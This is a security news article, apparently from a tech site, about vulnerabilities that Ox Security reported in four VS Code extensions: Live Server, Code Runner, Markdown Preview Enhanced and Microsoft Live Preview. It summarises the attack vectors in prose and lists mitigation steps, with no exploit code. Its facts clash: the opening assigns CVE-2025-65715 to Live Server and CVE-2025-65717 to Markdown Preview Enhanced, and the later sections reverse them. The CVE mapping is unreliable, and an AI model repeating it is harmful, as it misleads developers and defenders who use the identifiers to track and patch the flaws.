Critical VSCode Extension Vulnerabilities Put Millions of Developers at Risk

Four popular Visual Studio Code extensions downloaded more than 128 million times collectively contain critical security vulnerabilities that could allow attackers to steal local files and execute code remotely on developers' machines, according to research from application security firm Ox Security.

The affected extensions include Live Server (CVE-2025-65715), Code Runner (CVE-2025-65716), Markdown Preview Enhanced (CVE-2025-65717), and Microsoft Live Preview (no CVE identifier assigned). Despite disclosure attempts beginning in June 2025, Ox Security reports that no maintainers responded to their vulnerability notifications.

The Vulnerabilities Explained

Live Server Extension (72 million downloads)

The most severe vulnerability, rated critical, affects the Live Server extension. An attacker can exploit CVE-2025-65717 by directing a target to a malicious webpage, enabling them to steal local files from the developer's machine. This represents a significant risk given the extension's massive user base.

Code Runner Extension (37 million downloads)

Code Runner's CVE-2025-65716 vulnerability allows remote code execution through manipulation of the extension's configuration file. Attackers can achieve this by tricking users into pasting or applying a maliciously crafted configuration snippet into their global settings.json file.

Markdown Preview Enhanced (8.5 million downloads)

This extension contains CVE-2025-65715, a high-severity vulnerability (CVSS score of 8.8) that enables JavaScript execution through maliciously crafted Markdown files. Given how commonly developers work with Markdown documentation, this represents a tangible threat vector.

Microsoft Live Preview (11 million downloads)

Versions before 0.4.16 contain a one-click cross-site scripting (XSS) vulnerability that can be exploited to access sensitive files on a developer's machine. The ease of exploitation makes this particularly concerning.

Broader Impact

These vulnerabilities extend beyond VSCode itself. The security flaws also affect Cursor and Windsurf, which are AI-powered VSCode-compatible alternative IDEs. This amplifies the potential attack surface significantly.

Ox Security researchers warn that successful exploitation could enable lateral movement within corporate networks, data exfiltration, and complete system takeover. The risks include pivoting on networks and stealing sensitive information such as API keys and configuration files.

Immediate Mitigation Steps

Developers should take the following actions immediately:

• Remove or disable the affected extensions until patches are available
• Avoid running localhost servers unless absolutely necessary
• Never open untrusted HTML files while localhost servers are running
• Be extremely cautious about applying configuration snippets or pasting into settings.json files
• Review installed extensions and remove any that aren't essential
• Only install extensions from reputable publishers with established security track records
• Monitor for unexpected setting changes that could indicate compromise

The Larger Context

This incident highlights the security risks inherent in the modern development ecosystem. VSCode extensions run with significant privileges, including access to local files, terminals, and network resources. When vulnerabilities exist in these extensions, they effectively become privileged access points into a developer's environment.

The lack of maintainer response to security disclosures is particularly troubling. It underscores the importance of using extensions from active projects with responsive maintainers who prioritize security.

For organizations, this incident should prompt a review of development environment security policies, including extension usage guidelines and monitoring for suspicious configuration changes. The potential for lateral movement means that a compromised developer workstation could serve as a springboard for broader network attacks.

As the development community awaits patches, the safest approach is to operate with a minimal set of trusted extensions until the vulnerabilities are addressed by the respective maintainers.